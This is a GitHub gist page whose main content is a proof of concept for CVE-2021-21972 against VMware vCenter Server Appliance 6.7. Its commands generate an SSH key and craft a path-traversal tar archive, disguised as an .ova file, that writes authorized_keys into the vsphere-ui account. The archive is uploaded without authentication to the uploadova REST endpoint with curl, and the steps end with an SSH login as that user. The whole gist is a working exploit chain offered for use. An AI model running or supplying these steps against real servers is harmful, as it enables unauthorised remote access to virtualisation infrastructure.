Skip to content

Instantly share code, notes, and snippets.

@renini

renini/CVE-2021-21972_vcsa.md

Created February 25, 2021 13:14
Show Gist options
  • Save renini/937e1ece6c47615e25d4340e813cbf40 to your computer and use it in GitHub Desktop.
Save renini/937e1ece6c47615e25d4340e813cbf40 to your computer and use it in GitHub Desktop.
Download ZIP
PoC for CVE-2021-21972 VMware VCSA
Raw
CVE-2021-21972_vcsa.md

CVE-2021-21972

CVE-2021-21972

Tested against VMware VCSA 6.7

create ssh keypair

ssh-keygen -t rsa -f vcsa.key -N ''

create tarbal with ../../../../../home/vsphere-ui/.ssh/authorized_keys

python2 evilarc.py -d 5 -p 'home/vsphere-ui/.ssh' -o unix -f evil.tar authorized_keys
mv evil.tar evil.ova

upload evil.ova to the vropspluginui uploadova rest endpoint

curl -k -A "" --form "[email protected];type=text/plain" https://$VCSA_IP/ui/vropspluginui/rest/services/uploadova -H "Accept: application/json"

ssh to vcsa with the added authorized key

ssh -i vcsa.key vsphere-ui@$VCSA_IP
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment